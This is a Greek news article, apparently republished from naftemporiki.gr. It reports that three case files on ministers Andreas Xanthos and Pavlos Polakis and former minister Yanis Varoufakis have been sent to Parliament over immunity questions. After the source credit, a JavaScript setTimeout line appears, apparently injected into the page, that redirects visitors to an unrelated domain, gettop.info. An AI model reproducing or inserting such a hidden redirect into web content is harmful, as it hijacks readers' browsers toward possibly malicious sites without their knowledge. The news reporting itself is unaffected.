Δικογραφίες για Ξανθό, Πολάκη και Βαρουφάκη στη Βουλή

0
3

 

Στη Βουλή διαβιβάστηκαν από την Εισαγγελία τρεις δικογραφίες που αφορούν τον υπουργό Υγείας Ανδρέα Ξανθό, τον αναπληρωτή υπουργό Υγείας Παύλο Πολάκη και τον τέως υπουργό Οικονομικών Γιάνη Βαρουφάκη.

Μηνυτήρια αναφορά σε βάρος των κ.κ. Ξανθού και Πολάκη κατέθεσαν δύο κάτοικοι της Κοζάνης για προβλήματα που υπάρχουν στη λειτουργία των κρατικών νοσοκομείων της πόλης τους, λόγω έλλειψης προσωπικού, με αποτέλεσμα να μην καλύπτονται τα επείγοντα περιστατικά.

Οι δυο πολίτες ζητούν να κινηθεί η διαδικασία περί ευθύνης υπουργών (παράβαση καθήκοντος) κατά της ηγεσίας του υπουργείου Υγείας.

Η δεύτερη δικογραφία αφορά μηνυτήρια αναφορά που έχει καταθέσει ο τέως αναπληρωτής υπουργός Υγείας Μάριος Σαλμάς σε βάρος του κ. Πολάκη για συκοφαντική δυσφήμηση, λόγω δηλώσεων του. Ο κ. Πολάκης σε δηλώσεις του φέρεται να έχει πει, μεταξύ άλλων, ότι σε συνεννόηση με το υπουργείο Υγείας επί κυβέρνησης Ν.Δ., ορίστηκε υψηλή αμοιβή για ορθοπεδική εξέταση με μηχάνημα που στην Ελλάδα διαθέτει μόνο ο κ. Σαλμάς.

Η τρίτη δικογραφία η οποία διαβιβάστηκε στη Βουλή αφορά τον κ. Βαρουφάκη και σχηματίστηκε μετά από μηνυτήρια αναφορά σε βάρος του πρώην υπουργού για το αδίκημα της εσχάτης προδοσίας, καθώς κατηγορείται ότι, με πράξεις και παραλείψεις του, φέρεται να υπονόμευσε την έγκαιρη και συμφέρουσα συμφωνία με τους δανειστές, κατά παράβαση της εντολής που είχε από τον Πρωθυπουργό, τη Βουλή και το λαό.

Η Βουλή θα αποφασίσει για την άρση ή μη της ασυλίας των τριών πολιτικών προσώπων.

 

Πηγή:naftemporiki.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here